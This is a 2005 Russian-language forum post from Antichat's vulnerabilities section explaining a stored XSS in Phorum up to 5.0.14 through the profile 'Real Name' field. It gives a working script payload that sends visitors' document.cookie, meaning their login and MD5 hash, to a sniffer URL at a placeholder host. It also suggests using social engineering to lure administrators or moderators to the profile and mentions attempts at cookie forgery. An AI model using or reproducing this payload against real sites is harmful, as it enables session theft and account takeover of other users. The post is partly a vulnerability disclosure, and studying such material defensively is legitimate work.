ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

XSS в Phorum<=5.0.14
  #1  
Старый 16.03.2005, 10:28
Аватар для tester2005
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
Arrow XSS в Phorum<=5.0.14

CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:
Код:
Вовочка<script>alert(document.cookie)</script>
Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно
Теперь как можно употребить на других,
В поле Real Nаme вставим:
Код:
Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
Или че то подобное, где URL это адрес снифера.
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.
Теперь, подделка куков, жаль не сработала, вчера пыхтел любыми путями, не получилось Может у кого другого получитса, дай знать. Братец KEZ от снеми видео, еси такое дело с куками провернётса
Просто этот форум времмено содержит куки, которые через некоторое время уничтажаютса, что требует повторной авторизации.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ